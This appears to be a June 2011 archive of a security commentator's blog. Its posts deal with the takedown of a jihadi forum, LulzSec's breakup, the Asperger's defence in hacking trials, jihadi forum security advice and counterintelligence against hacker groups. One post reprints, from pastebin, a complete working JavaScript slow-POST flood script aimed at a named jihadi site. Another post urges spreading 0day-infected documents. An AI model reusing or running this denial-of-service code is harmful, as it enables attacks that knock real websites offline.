Archive for June 2011
The Eternal Game of Whack-A-Mole Goes On: Was Al-Shamukh Hacked?
The Eternal Game of Whack-A-Mole Goes On:
Al-Shamikh1, the Shamukh Al-Islam AQ site is down, and has been allegedly under attack since this weekend. It’s mirrors are down as well and according to the news media Here and Here citing Evan Kohlmann of Flashpoint Global. The problem I have with the stories that the media is ravening over now is either that Evan is not painting the full picture or the media, as usually, is not understanding what he is saying. As for my take on it, it’s a little of both really. Evan has been around for a long time working as a consultant on terrorism, but as far as I know, he is not a network security specialist.
Over the weekend I had heard and re-tweeted reports that Shamikh was under an attack of some kind and the site was intermittently unavailable. as I had a whiskey in hand and no motivation, I let it be and figured it was maybe Jester doing his usual thing. Then today I see the barrage of bad media accounts with headlines like;
British Hackers Take Down Al-Qaeda Websites
and
NBC News: Hacker attack cripples al-Qaida Web communications
*Facepalm*
None of the articles cites any clear evidence of who did what never mind what actually happened to the site! Upon investigation this morning after being contacted by someone in the UK press, I found the following salient point:
From: robtex.com The domain and NS pointers have been suspended by GoDaddy
The domain and the name servers have been suspended by Godaddy. This is why it is offline now. Perhaps it was DD0S’d for a while and the traffic was the final straw for Godaddy on this site. You see, this site has been on the Godaddy for some time and many have pointed this fact out before, to no avail.. Well, actually one might assume that the feds just wanted to know where it was and leave it be to monitor.. But, that’s a bit too subtle for the media.
Whois data for shamikh1.net
Either way, the site is down now because they cannot route to it via the domain. Backups of the site hosted on non domain named boxes are down and the core server may have been compromised. It’s all up in the air at the moment but the media is just trucking along with the story. It may in fact be that the server was core was pulled by the jihadi’s themselves because they have been real twitchy since the 2010 roll up of al-faloja.
In the case of Shamikh, I had seen in the past that this site had some security issues to begin with. The implementation of the phpbb was weak and there were ways to get into the board and collect data. In one case, they had even re-set passwords and one could get them from the site itself for those users as they had passed them in the clear in what they thought was a secure space. Others have been using these vulns for some time to audit what is going on in the boards and have in the past run operations that have kept the admin’s and the jihadi’s on edge. This is why today you see so many more discussion groups on computer security, but more so how to configure and secure phpbb today on sites like As-Ansar.
Distributed Sites:
“Al-Qaida’s online communications have been temporarily crippled, and it does not have a single trusted distribution channel available on the Internet,” said Evan Kohlmann, of Flashpoint Global Partners, which monitors the group’s communications.
This one line really just grinds my gears here. I am sorry Evan, but this site is not the only one out there that has this type of content and even though the core is down, the content lives on in other sites. The Jihadi’s have created redundancy in the number of sites, not just put all their terrorist eggs in one digital basket. All of the sites link to one another as fraternal organisations do (i.e. As-Ansar has much the same content as Shamikh1). Remember, this is an group performing insurgency who know the power of cells and this is no different online. An example of this is the site in question of Shamikh, which has had many sites online at different times. Some get pulled down as they have issues with the hosts removing them. Others still have stealth sites on compromised systems, or in cases like the boxes in Malaysia, hosted secretly with complicity on the part of someone in the network (see paradius net)
In the case of Shamikh1 the following sites are known to have hosted or, as in the case of shamikh1.info, was scheduled to be soon.
http://202.149.72.130/~shamikh/vb/
http://202.149.72.131/~shamikh/vb/
http://202.75.56.237/~shamikh/vb/
All of these systems are down at least content wise for Shamikh, the .info though is online and untouched but hosts no content as yet. It seems to me that it was still being staged to host the content or maybe was set to be a backup.
shamikh1.info whois data
This has been the SOP for the jihadi sites for some time. In case one site is hit, the rest are online to keep the content online. In this case though, it seems that the “sophisticated and coordinated attack” really just means that they hit the core server for Shamikh so the content is not getting to the satellite sites. Of course once again, there is no data to say how this attack was carried out and how massive it may have been. Like I said, lately the e-jihadi’s have been twitchy about security for a while now because they have been compromised in the past.
So, all of this reporting that it was a huge state run hack and was massive takedown is mostly media hype and, I am afraid, as you can see from the reporting, it all seems to be coming from Mr. Kohlmann. Who’s privately run consultancy is getting quite a bit of attention now.. Isn’t it?
Cupcake Recipies Instead of IED’s Do Not A Hack Make:
Another thing that is sticking in my craw is this whole linking this outage/hack to the “cupcake” incident with Inspire Magazine. These two things are NOT alike and the media needs to pay attention to the facts. Nor is there any evidence cited or even hinted at in the real world that MI6 or Five for that matter had anything to do with this. For all they know, it could have been Jester or someone with like technology that dos’d them and got them yanked offline by their host.
Let me set the record straight here. The MI6 operation on Inspire was a PSYOP. They poisoned the well (i.e. Al-Malahem’s media apparatus) by intercepting the AQ file and replacing it with their own. Just where this happened no one is sure. Was it on some desktop somewhere before being put out? Or, was it replaced with the edited file on the megashare?
No one has said.
This operation though served two purposes. First off, it managed to stop AQ from getting the IED manual out to everyone, but secondly, and more importantly, it make AQ question its communications security. This was even more important and we can see the effects of that today in posts on the boards about security.
They are worried.
Oh dear media, pay attention and get the story straight. While the Cupcake operation had style and was claimed by MI6, this current claimed attack on Shamikh has no attribution by anyone and there is no proof that I have seen to say that anyone did anything… Save that their site is down.
Whodunnit:
This all leaves me wondering just who may have attacked Shamikh and why. Given that the sites are often taken down only to show up elsewhere makes me question why it was done at all. It would be simpler to monitor the site and capture data than to send them all scurrying into the woods would it not? This was my primary issue with the Jester’s campaign, it did no good. Even if you are driving them off the sites, they will only move toward less visible ones and use more covert means of communication. Why not let them feel fat, dumb, and happy while we watch their every move?
All I can think of, if this was state sanctioned, was that the Shamikh site was about to drop some content that someone did not want out there so they took the network down. If it wasn’t state sanctioned and some hacker or hackers decided to mess with them they did it for their own reasons. Either way, the sites got taken down..
But, they will be back again… Let the great game of whack a mole begin!
K.
Tell Me if You’ve Seen This One Before…
As found on pastebin minutes ago…
-
include(“framework/mootools.js”);
-
var PostFlood = function(url) {
-
this.url = url;
-
this.sockets = [];
-
let result = this.url.match(“^.*?://(.*?)(:([0-9]+))?((/.*)|)$”);
-
this.host = result[1];
-
this.port = result[3] || 80;
-
this.query = result[4];
-
}
-
PostFlood.prototype.start = function(n, duration) {
-
for (let i = 0; i < n; i++) {
-
Ape.setTimeout(function(z) {
-
let socket = new Ape.sockClient(80, this.host, { flushlf: false });
-
socket.n = z;
-
socket.t = 0;
-
socket.onConnect = function() {
-
let x = 0;
-
//socket.write = Ape.log;
-
Ape.log(‘connected (‘+z+’)’);
-
socket.write(‘POST ‘+this.query+’ HTTP/1.0\n’);
-
socket.write(‘Host: ‘+this.host+’\n’);
-
socket.write(‘User-Agent: Mozilla/4.0\n’);
-
socket.write(‘Content-length: ‘+duration+’\n\n’);
-
let timer = Ape.setInterval(function() {
-
if (x++ == duration) {
-
Ape.clearInterval(timer);
-
return;
-
}
-
socket.t++;
-
socket.write(‘a’);
-
}, $random(900, 1100));
-
}.bind(this)
-
socket.onRead = function(data) {
-
//Ape.log(data);
-
}
-
socket.onDisconnect = function() {
-
Ape.log(‘Disconnected’);
-
}
-
}.bind(this), $random(20, 30)*i, i);
-
}
-
}
-
Ape.addEvent(‘init’, function() {
-
Ape.log(‘start’);
-
var flood = new PostFlood(‘http://majahden.com/’);
-
flood.start(800, 600);
-
});
Asperger’s: The New Insanity Defense for Hacking?
Asperger syndrome or Asperger’s syndrome or Asperger disorder (
/ˈɑspərɡərz/[1] or /ˈæspərɡərz/[2]) is an autism spectrum disorder that is characterized by significant difficulties in social interaction, along with restricted and repetitive patterns of behavior and interests. It differs from other autism spectrum disorders by its relative preservation of linguistic and cognitive development. Although not required for diagnosis, physical clumsiness and atypical use of language are frequently reported.[3][4]
From Wikipedia
Since the Gary McKinnon case, the use of the diagnosis by a defence team of “Asperger’s” seems to have become a go to position, at least that is presently in the U.K. justice system. The recent arrest of Ryan Cleary for cracking and DD0S attacks on sites such as SOCA also seems to be showing a penchant in the UK legal system toward launching a kind of an “Insanity Defence” by proxy of a declaration that Ryan is a high functioning autistic (Asperger’s) and that because of it, he may have not been able to stop himself.
While this theory may be in fact be the case in with both of these defendants on some level, the LEGAL aspect of this is this;
“Did they know they were committing crimes? Furthermore, can it be proven without a doubt that they both suffered to the extent that the compulsive behaviour was inescapable?”
If the answer is definitively that they had no control, then they should be treated and perhaps NEVER allowed access to the Internet again. This might be the way to punish them as well as keep them out of the penal system (even the mental health facilities therein) as opposed to putting them into the general populace in prison. However, I do not feel that the diagnosis of Asperger’s can really allow for their innocence of the crimes that they are charged with. Both of these guys are functionally capable of interacting with others around them and certainly capable of holding technical knowledge and acting upon it for their own ends.
The one point that the lawyers will make though is this notion that Asperger’s sufferers display obsessive behaviours concerning specific things that interest them. Some collect things, others memorise things. In the case of McKinnon and Cleary, they both obsessively hacked into things and stole data. In the Cleary case though, he was caught in the act of DD0s’ing a UK police site when they caught him. As far as I know, this is not necessarily a known Asperger’s syndrome effect or behaviour. (see below)
People with Asperger syndrome often display behavior, interests, and activities that are restricted and repetitive and are sometimes abnormally intense or focused. They may stick to inflexible routines, move in stereotyped and repetitive ways, or preoccupy themselves with parts of objects.[24]
Pursuit of specific and narrow areas of interest is one of the most striking features of AS.[3] Individuals with AS may collect volumes of detailed information on a relatively narrow topic such as weather data or star names, without necessarily having genuine understanding of the broader topic.[3][7] For example, a child might memorize camera model numbers while caring little about photography.[3] This behavior is usually apparent by grade school, typically age 5 or 6 in the United States.[3] Although these special interests may change from time to time, they typically become more unusual and narrowly focused, and often dominate social interaction so much that the entire family may become immersed. Because narrow topics often capture the interest of children, this symptom may go unrecognized.[7
From Wikipedia
So, basically we have the lawyers in the UK trying to say “You can’t put Rainman in jail!” My question is just how long will it be before the US legal system catches up to this defence tool too? Can you imagine the next cases in the US being tried and the legal team for the accused finding a shrink that will testify that the cracker could not help himself..
He has Asperger’s after all!
This does not fly with me and I don’t see the court system or juries buying into it either, but you know they will try. Presently, the cases in the UK are being spun up and in the case of McKinnon, he has been fighting extradition for quite some time for hacking NASA. All the while his people have in fact been fighting the case in the media playing up that he is mentally unstable in the hopes that pity will prevail. The very same thing seems to be shaping up already for the Cleary case with videos (him stoned off his ass from huffing glue or perhaps just 420’d) showing up online and the diagnosis making the front pages of many news outlets.
Sorry.. But I don’t buy it. Sure, you may be mentally ill Ryan, but, I still think you knew what you were doing and are high enough functioning to be put in the pokey for it. Which brings me to another statement that is sticking in my craw;
LulzSec disbands: Hacking group LulzSec announced it was disbanding Saturday, 50 days after its first publicised hack. A member of the group told The Associated Press that the group was “bored” and denied that it was stopping its public attacks because of pressure from law enforcement. The LulzSec member did, however, say that some of the chat logs and information about hackers’ identities was correct.
From The Washington Post
Bored? BORED? Really? How about you go out and get some exercise or maybe read a book? Bored, I know that this likely is just a ruse in this case as the Feds are investigating all those DOX put out on you all but really, bored. This does though make me ask why they are doing this, and just how do they all rationalise in their heads about the right and wrong of it.
Does Lulzsec have Asperger’s en toto? Or have we raised and are we will raising generations of sociopaths with computers I wonder? Looking at 4chan, one can see where the Lulz came from and frankly, while some of it is damn funny, other things there are a bit disturbing. The conventions of society seem to have been stripped in the digital world and it is anything goes… AND this is the crux of the issue isn’t it? After all, now the hacking and the cyber bullying etc have begun to manifest real life physical outcomes today because we have networked our lives so much.
The Lulz actions to date really did not amount to much in the sense of destroying lives as far as I know of. However, they have broken many laws and thought themselves to be outside of their dominion. I am pretty sure that some, if not all of them, are about to find out otherwise, but, it is a disturbing trend isn’t it? Because the internet is so new and the parents of these kids likely have had little interface with it, they have not even thought about trying to apply the norms of how they should act in the real world and society to the digital world.
That is the problem.
It’s time to give out the digital spankings.
K.
LulzSec’s Pre-Pwn3d AT&T USB Image
It seems that the Lulz just keep on coming from the LulzBoat, even if they have sailed into the sunset. Upon investigation the USB bootable file from AT&T has malware within it. The winrar.exe file that is on board is a trojan as you can see in the capture above. It now remains to be seen whether or not this file was pre-pwn3d (i.e. the file was already corrupted with malware when they stole it) or, that someone was being smart with us all from Lulzsec and seeing just how many fools would make an iso and run the bootable then install the handy winrar.exe pre packaged with it.
Either way, you kids out there who have downloaded the v1 of the torrent, be careful not to pwn yourselves as you play!
Have fun!
K.
The Lulzboat Sailed The Internets and All I Got Was This Stupid Garbage File!
That’s it? All we get is this stinkin garbage file?
Well, it seems that the Lulz are over for now as last night saw the Lulzboat sail into the sunset. In a post on twitter and a rapidly seeded file dump on Pirate Bay, the LulzSec collective decided to hang up their tophat claiming that they were basically going to pull a Costanza at the top of their game.
Within the torrent file the following parting words were sent:
Friends around the globe,
We are Lulz Security, and this is our final release, as today marks something meaningful to us. 50 days ago, we set sail with our humble ship on an uneasy and brutal ocean: the Internet. The hate machine, the love machine, the machine powered by many machines. We are all part of it, helping it grow, and helping it grow on us.
For the past 50 days we’ve been disrupting and exposing corporations, governments, often the general population itself, and quite possibly everything in between, just because we could. All to selflessly entertain others – vanity, fame, recognition, all of these things are shadowed by our desire for that which we all love. The raw, uninterrupted, chaotic thrill of entertainment and anarchy. It’s what we all crave, even the seemingly lifeless politicians and emotionless, middle-aged self-titled failures. You are not failures. You have not blown away. You can get what you want and you are worth having it, believe in yourself.
While we are responsible for everything that The Lulz Boat is, we are not tied to this identity permanently. Behind this jolly visage of rainbows and top hats, we are people. People with a preference for music, a preference for food; we have varying taste in clothes and television, we are just like you. Even Hitler and Osama Bin Laden had these unique variations and style, and isn’t that interesting to know? The mediocre painter turned supervillain liked cats more than we did.
Again, behind the mask, behind the insanity and mayhem, we truly believe in the AntiSec movement. We believe in it so strongly that we brought it back, much to the dismay of those looking for more anarchic lulz. We hope, wish, even beg, that the movement manifests itself into a revolution that can continue on without us. The support we’ve gathered for it in such a short space of time is truly overwhelming, and not to mention humbling. Please don’t stop. Together, united, we can stomp down our common oppressors and imbue ourselves with the power and freedom we deserve.
So with those last thoughts, it’s time to say bon voyage. Our planned 50 day cruise has expired, and we must now sail into the distance, leaving behind – we hope – inspiration, fear, denial, happiness, approval, disapproval, mockery, embarrassment, thoughtfulness, jealousy, hate, even love. If anything, we hope we had a microscopic impact on someone, somewhere. Anywhere.
Thank you for sailing with us. The breeze is fresh and the sun is setting, so now we head for the horizon.
Let it flow…
Hrmmm.. 50 days? Is there any real significance to this other than perhaps the party van was pulling up outside your doors and you had to dump the garbage file quick like? Honestly, the files that you dumped, while in sheer numbers of passwords and logon’s to a few sites is well, kinda weak. In short, there is nothing revelatory here. I mean, jeez at LEAST the garbage file in the movie had some interesting malware shit in it right?
The Files:
So, we have some AT&T data from inside that cover some frequency ranges, and some manuals, minutes from meetings etc that are kind of interesting. There is a scan of the FBI.gov site that shows a vuln, and they managed to add Pablo Escobar to the Navy jobs database.
Whoopee.
All in all I have to give the Lulzsec crew a big “MEH” on this as well as their other dumps really. Sure, they have pointed out that low hanging fruit is abundant on the internet, but, really, who in the security or hacking world did not know this? Further more, what does the average everyday end user care? I mean, if their passwords are stolen, they will reset them. If their money is stolen they are insured by the Fed… Is there a great hue and cry from the masses because Lulz were had by the general populace to have the Lulzboat crew hoisted on the yard arm?
Not that I have seen.
In short kidz, you have only served to amuse yourselves and others out there but if you had anything else in mind about bringing change to the scene, I don’t think you have succeeded. People are creatures of habit and sloth. Short of taking the whole system down for the count, nothing will be so epic as to make corporations secure their networks and perform due diligence. Those who have done so out of worry because of your antics will go back to their peaceful Luddite slumber.
Leaving So Soon?
So, on to your sudden departure from the scene. I have the feeling that as I had written about before, you were coming to realize that perhaps you could never be as clever or wily to evade detection and prosecution given your penchant for the dramatic you all seem to have. Your propaganda machine and communication channels were leaking, this you could see from the A-Team dumps.
You guys have tried variations of your names, you have attempted obfuscate as much as you could, but, in the end, your re-use of favored screen names was your undoing. You see, the jester has been scouring the internet (I am sure with help from others) looking for any connections to those screen names or iterations thereof. I myself have done this and came up with analogous data to what jester and others have posted. With each successive day, your true identities are being uncovered if they have not fully been as of now.
However, this re-use of nick names and ties to email addresses aside, you guys just were immature enough to do yourselves in with petty disputes and the use of non trustworthy assets. This whole outing of each other thing was one of the most stupid things I have seen. Sure, some of it could be digital chaff, with you trying to set out disinformation, but I think that is not the case. Your own hubris shall be the thing that ends up placing the party vans on your collective front steps.
Lets face it, you played the game of spooks and I think in the end, you will lose. In fact, I think that you should probably have been better off had you just gone off seeking some sharks with frikkin lazers on their heads in your volcano lair instead of playing with the fire that you have been. Once they do pop you, you all are going to see some very interesting things inside jail as the governments kluge together terrorism charges on you.
Your Legacy:
Well, I guess we will have to see if anyone decides to take up the Lulzsec mantle. For now, we all await the party van posse to pick you all up sooner or later. You have spawned some more fools though like Team Poison who want to up the ante with releases of data like old Tony Blair stuff… That was kinda lame too frankly and made so sense when they claimed to still have access.. Why dump what you have and then claim to still have access? If it was current, I am pretty sure they have yanked the plug on that mail server and ‘five’ has it.
Oh, did you take that into account? I mean, he is Tony Blair after all… They are MI5… ‘Expect them’
So where was I?… Oh yeah..
In all of your dumps you delivered nothing worth your or our time. You proved a point that SQLi is prevalent but who didn’t know this? You have proved that you were pretty immature and likely suffer from Asperger’s yourselves… Well that will be the claim that your lawyers make to the judge won’t it huh? I mean that is the mental illness du jour as excuses go for immature hacking antics today isn’t it? I don’t think that will work though, the government just doesn’t care, they will medicate you and then put you on trial. You see Asperger’s is not a form of insanity, and the insanity plea, as some of us know, is NOTORIOUSLY hard to use as a defense in court. Nope, you guys really actually suffer from inflated ego’s and too much jolt cola.. That’s my diagnosis, for what its worth.
So, yeah, legacy… Well, you certainly have tried to do your best imitation of SPECTRE, but instead you came off as Bighead. I am sure there will be others following in your footsteps, but, in the end I don’t think you have launched a new SPECTRE.
Nope, I expect your real legacy will be the creation of more draconian laws by the government as a backlash to your antics. Laws that will make all our lives a bit more less private and a lot more prone to being misused. I also expect that the lulz will continue, though at your expense once you are all caught and put into the pokey.
… And those lulz will also be epic fail.
K.
IMPORTANT SECURITY TIPS: Security Tips for Jihobbyists At Majahden
Security Tips for Majahden2 Users and Jihobbyists
Important Security Tips from Majahden:
The boys at Majahden have been learning lately about how psyops, hacking, disinformation, and being pwn3d works. I suppose since Osama went to live in a pineapple under the sea, they have been taking stock of just how much information they are leaking on the boards out there on the internets. There have been a spate of timely deaths in the AQ camp of late as well as a few arrests, but really, the intelligence coup of finding OBL and whacking him has all the jihobbyists worried that they will be next.
Of course they should be worried, but not only because OBL was popped. You see, we have been inside their shit for some time now and they just did not know it I guess. I have written in the past about sites that I have been poking at and digging through and I know in the case of Al-faloja (may it rest un-peacefully) I was able to get quite a bit of data from them. Since Al-Faloja fell down and went boom, there have been many site re-vamps by many a phpBB admin but they still seem to be on the whole, lacking the skills to really secure their shit.
Oopsies!
So, from their sooper sekret squirrel lair we have the following text from the above screen shot on majahden entitled “Important Security Tips” From this post I can say that they have been learning though. The tips are good and if followed it will make it just a teensy bit harder to track them and eventually have them picked up. Here are some good ones:
- Trust no one: See a new member asking all kinds of questions about going to jihad? Be wary of them they may be spies
- Use internet cafe’s to log in and post to the boards because they can track your IP address
- DO NOT use just one internet cafe! Move around and make sure that you go outside your usual area (where you live)
- Use a PROXY at the cafe!
- Be careful though at the cafe because they are on the lookout for swarthy types like us!
- NEVER give out your real information to ANY forum! (i.e. Bday, phone, etc)
- Beware of files published to the forums! They could be malware!
- Beware of popup installs like Java on the boards, they are not proper and likely a means to compromise you!
- Beware people asking you to email them from the forum (use the message program on the board)
- DO NOT RE-USE PASSWORDS!
- Be careful what information (personal) you put on the site
- Be careful about posting anecdotes about seeing this or that imam speak (places you in a place and a time)
AND Finally, in the FUNNIEST note of the list;
- This is not a dating site! You want to make friends do that separately from the jihadi forums.
*snort*
In all, these warnings are good solid rules of the road for anyone going anywhere on the internet never mind on a jihadi board being audited by the likes of moi. Just from a privacy standpoint these types of suggestions are valid as well and should be the standard for anyone not wanting their identity stolen or their stuff hacked easily. This however, is pretty new to all of these guys and are the rudiments of SECOPS for them. Up til now, they have been not following any of these precepts, and to have to say this is not a dating site? Well, that kinda says it all to me hehe.
Meanwhile another tasty tidbit came up from the same site and this one is a little more interesting. The above screen cap is for a posting called “Deceptive methods to extract information” and it covers primarily the idea of snitches being placed in cells at camps to elicit information from jihadi’s. Now, this is nothing new to anyone who has had a diet of movies or TV here in the US, but perhaps it is a new one for these guys. Informants in the form of turncoat prisoners or actual agents from the likes of the CIA etc, have been standard operations to get information without the enemy knowing it.
This post is written by someone though who has had first hand experience with being detained. They go on to describe very specific scenarios and methods to evade giving up information to the “birds” as they are calling them. (I think they mean stool pigeons) The writer gives suggestions on how to detect the turncoats and or to deal with the interrogators methods in trying to cajole information from them. All in all, this is an interesting read that comes across as someone who has had direct experience and understands PSYOPS.
The Take Away:
These posts and others within the site have me thinking that they are starting to become a bit more sophisticated in their efforts online. There are numerous tutorials now on chaining Tor and proxy-ing as well as the use of crypto and other security oriented programs. TNT_ON has been busy posting more tutorials as well as lauding Younis Tsouli (aka irhabi007, now in jail) as the progenitor of the jihadi hacking scene. All I can really say is that it is maturing and we need to step up our efforts with regard to them.
With the new invigoration within the cyber-jihadi community since OBL’s great pineapple adventure, they have taken up the gauntlet not only to hack but to wage a cyber-propaganda campaign like never before. Presently, the jihadi’s on Majahden and other sites have been spinning up and creating numerous Facebook sites that conform to standards that will fly under the FB radar (FB has been pulling sites down just about as fast as they could put them up) this has become the new “stealth jihad” They are making the effort now to have innocent front pages that lead to many other more hidden pages containing hardcore jihadi content. This is something that was being espoused last year on the boards and is now coming into acceptance as the main modus operandi. This way they can have their content and not get it 0wned or taken down by the likes of Facebook or Blogspot.
Since the advent of the LulzSec crew, it just seems that we all have been focused elsewhere.. Time to wake up and go back to working these fools. I say it is time to start a program of 0day infected dox that will be downloaded from all those sharing sites that these guys love. Remember the whole cupcake thing with Inspire? I say we do it en masse for as many sites as we can. Added to this, we should also be using many more approaches such as PSYOPS, Disinformation, and all out penetration of their servers… No matter where they sit.
But that’s just me… I also think that perhaps the NSA might have that already covered… One wonders…
At the very least, we should keep an eye on these sites.. If not for the lulz, then for taking them down once and for all.
K.
LulzSec: How NOT To Run An Insurgency
Oh how the Lulz turn…
Lulzsec seems to be imploding a bit with the pressure put on them by their own interpersonal issues as well as the likes of Th3j35t3r and the Web Ninja’s on their backs as well. I however, would like to point out the Lulz tactical failures that are directly leading to their ultimate party van special that seems to be coming soon. I say ‘seems’ to be coming because who really knows what will happen. Perhaps some of these guys will actually skate because they were smart enough to keep some of their personal details.. well.. personal.. Maybe not though as is evidenced by the ‘doxing pastebin-palooza’ of late.
Secrecy is important:
LulzSec seems to have misunderstood that secrecy is really really important when you are doing something like a digital insurgency. Sure, you can try to rely on all the technologies like proxies to hide your IP, but, you also have the human element to contend with. It is here where the Lulz have not thought things out too clearly. They attempted to use the Anonymous model, but, unlike Anonymous, they, had a smaller crew and a central core that, well, has been rather chatty. Chatty mind you, on IRC channels that have been compromised and monitored.
Loose lips sink ships.. Yeah, I went there…
Nope, while Lulzsec has been attempting to be secret, they failed to follow through and actually carry out their insurgency behind a wall of utter secrecy or even a cell based infrastructure it seems. Of course most of these efforts have been planed out and talked about on said IRC channels (even the sooper sekret ones) and advertised so others could revel in the lulz.
This and the other things I am going to mention will be their undoing.
Communications Should be COVERT:
Ok, so, how long did Osama have runners with USB keys on donkey’s going to Peshawar Internet cafe’s without being caught? Oh, yeah, 10 friggin years! It took the CIA a long time to catch on to the runners/couriers and even then they did so only from a VERY FEW pieces of hard SIGINT. The key here kids is that the AQ guys were practising ‘tradecraft’ unlike the Lulzsec kids. They took pains to insure that their communications were not easily picked up by the NSA or anyone else listening and watching.
You guys in Lulzsec? Not so much….
Instead, you have relied on technology to keep you safe while flagrantly whipping out your collective pee pee’s and waving them at forces who are much better equipped, trained, and funded to hunt you down and make you go bye bye. Some might see that as daring… Others see it as just plain stupid. Either way, since you have failed to use real covert channels that you do not advertise, you have highly increased the likelihood that you will soon see those party van’s you speak of so often (mockingly) in your yards as they start taking all your computers out the door, and you to the local orange jump suit palace.
Next time, just have your meetings in the parking lot of the local PD. It will cut out the middle man.
Ego is the mind killer:
I must not have too much Ego. Ego is the mind-killer. Ego is the little-death that brings total obliteration. I will face my Ego. I will permit it to pass over me and through me. And when it has gone past I will turn the inner eye to see its path. Where the Ego has gone there will be nothing. Only I will remain.
Ah yes, I have been ruminating on this one for some time and even adjusted this quote from Dune, which I think fits nicely. Your ego’s have been writing checks that you aren’t likely to want to have cashed kids. You have said that you do it for the lulz, you have also made intimations that its about how poor security is within the internet ecology, but, I think mainly your motivations have been ego driven. What this means is that you are getting quite the buzz off of being so darn smart and snarky. You have been having fun poking the badgers in the eyes and feeling invincible.
Well, you aren’t geniuses and you aren’t invincible. Eventually everyone gets caught, especially those who do not take care to cover their tracks and act smartly.
Simply, your ego’s have done you in… Be sure to check that ego at the door to the federal penitentiary that will be your new home, because there are bigger and nastier people in there who will be trading you for smokes soon. Oh, and remember to buy a lot of tucks pads.. You are going to need them.
Untrustworthy Assets Should NOT be Trusted With Operational Details:
This brings me to the bust of your minimally affiliated IRC op Ryan. It seems from all of the press and from the kids history, that he was unstable to start. This is the guy you want to trust with any data, no matter how small, on who Lulzsec is and how they operate?
Really?
Well then, who else do you have running your servers and running errands? Because I think they are likely to be just as whacked as Ryan and likely to be caught and roll within the first few minutes of interrogation!
Bravo, well done!
If you guys had any operational smarts, you would have to know that you cannot trust anyone with the whole picture. You pretty much are claiming that now after his arrest, but I think secretly you are all leaving fudge stains in your pants presently. According to the police Ryan had A LOT of data laying round and how are you to know who he talked to and how much he really knew about you all? Even IF you tried to be as careful as possible, you more than likely slipped up and gave him information that he will be giving.. Nope.. wait.. HAS GIVEN to the FBI and the Met.
Another failure on your part in the game of insurgency… I guess you will learn the hard way. Just as you will learn that outing your pals yourselves because they decided they wanted out, or did something to piss you off, will only lead back to you. Not the smartest of moves should any of these guys have data on you that they can use to turn against you.
“Never burn an asset unless you burn them and then shoot them between the eyes.. Or they will come back at you”
LulzSec Fall Down.. Go BOOM:
Finally, as if you could not tell from everything I said above, you are going to go down and likely go down hard. It will be a learning experience for you and for everyone else who wants to let their ego run free to gather 220K of followers on twitter by poking the badger. I am imagining that Ryan and his volumes of digital data, are being disseminated throughout the community of Feds and other agencies as I write…
Oh well, like I said, there’d daring and then there is stupid… Remember what John Keating said in “Dead Poets”
“Phone call from God. If it had been collect, that would have been daring!”
Be seeing you soon as your being put in the back of the party van kids…
K.
The Curious Case of The Deputy Attache at FBI, Sofia, Bulgaria on LinkedIn
A friend messaged me this morning asking if I had ever heard of Pauline Roberts, who had been added to their LinkedIn. Having some resources at my disposal, I agreed to take a look and see just who this person may in fact be if not really the person she purports to be. In looking into Pauline’s past, I was unable to confirm ANY of her past references including the FBI. Now, this may in fact mean that this is a cut out account for someone looking to garner access to others with information they desire. This is the same type of action that the likes of Anna Chapman was undertaking with some of her compatriots as an “illegal” for the SVR while living in the United States.
In short, gathering intelligence and making connections via LinkedIn as well as other online and offline ways.
Back to Ms or Mrs, Roberts though. Her profile presents some interesting paradoxes that piqued my interest as well as set off the alarms for my friend.
- She is retired but using LinkedIn to make connections?
- She is incredibly open on her past with the FBI inclusive of her time as a ‘Deputy Attaché’ in Sofia at the end of her career.
- Her job history though (not seen in image above) includes being in TV news and Journalism at WKBN in Ohio but lists it as ‘law enforcement’
- Her photo on the LinkedIn has been shopped (background) and poorly.. Why?
- A general search of her name (married name) turned up nothing even in the government domains
On the face of it, it seems as though this profile may be a fake. Upon doing some good old detective work though, I managed to confirm that Pauline did in fact work at WKBN and was the News Director from an email exchange with someone who was there at the time. Furthermore, I asked the key question of whether or not she had left WKBN to go to Quantico for training and the answer was yes.
So.. It would seem that this is indeed Pauline Roberts formerly of the FBI and most recently an attaché in Sofia Bulgaria… But.. I still have questions about the profile and why so much information would be put out there. Especially for someone who did all of the things that this one claims. Imagine being a spook and then just putting up a LinkedIn page naming every station you worked at over the years.
That is not in my mind a good SECOP posture.
This all begs the question though about LinkedIn and social media in general. Just how much information do you really want out there? Is this somewhere you want to lay out such details of this kind of career (even a past one now..though recent) out there for everyone? On the flip side, all of us out there too may be the targets of campaigns to gather data about us and where we work in order for someone to gather intelligence (corporate or otherwise) So, it is important that you take into account just what you do and how much information you give out on sites like this.
As for my friend, well, on the face of it, she is real… Adding her is up to you… If she is the real deal though, could be a real asset having her in the list.. Or, maybe not given the SECOPS picture here..
K.
Lulz, Jester, and Counterintelligence On The Internet
Escalation:
I once wrote a blog post about ‘escalation’ and it seems that my fears are coming true as the Lulz Boat keeps making waves across the Internet. Between Lulzsec, Jester, Anonymous, and now God knows who else, we are seeing a re-birth of the 90’s anarchy hacking. However, since so much has changed network wise since the 90’s its been amplified a thousand fold. What has spun out of all the hacking (hactivism, vigilantism, whatever you want to call it) is that we are seeing just how a counter-intelligence operation is carried out. Th3j35t3r and his friends at Web-Ninjas’s are carrying out this counter-intelligence program and posting their findings on Lulzsecexposed as well as on th3j35t3rs own site on word-press.
To date, their efforts have not seemed to have either slowed Lulzsec’s antics, nor generated any federal arrests of anyone involved. However, I think it important to note the methods being used here to attempt to put faces to names in the lulz crew.
The LulzSec Problem:
The problem with trying to track lulzsec members is primarily the technologies that they are using prevent getting a real idea of where and who they are. By using VPN technologies, proxies, and compromised systems in the wild, they have been able to keep their true identities from being exposed in a more meaningful way other than screen names. Due to the problems of digital attribution, the governments of the world cannot quite get their hands around who these people are nor, would they be able to prove such in a court of law at the present time without solid digital forensics on the end users machines.
In the case of Lulzsec and Anonymous, they are not using just one system but many types of systems to protect their anonymity. Thus, with the right tools and obfuscation, they feel impervious to attack from anyone, be they government, law enforcement, or the likes of Th3j35t3r. Tactically, they have the advantage in many ways and it would take one of two types of attacks, if not both simultaneously, to take the Lulzsec and Anonymous core group down. The attacks I mention are these:
1) A direct attack on their IRC servers that host the secret C&C channels
2) Insertion of ‘agent provocateurs’ into the C&C of Lulzsec and Anonymous (as recently alluded to with the FBI stat that one in 4 hackers are CI’s recently)
I actually would suggest that both avenues of attack would have the best effect along with a healthy program of disinformation and PSYOPS to keep the adversary unbalanced and malleable. Which leads me to my next section.. The methods of attack.
Counter-Intelligence:
An overall category, Counter-Intelligence ranges all of the afore-mentioned types of attacks. In the case of Lulzsec, anyone could be a member within the community that encompasses info-sec or anonymous. Hell, Jester could actually know some of these people in real life just as well as you the reader might and never know it if the member never talks about it. I imagine it’s kind of like Fight Club;
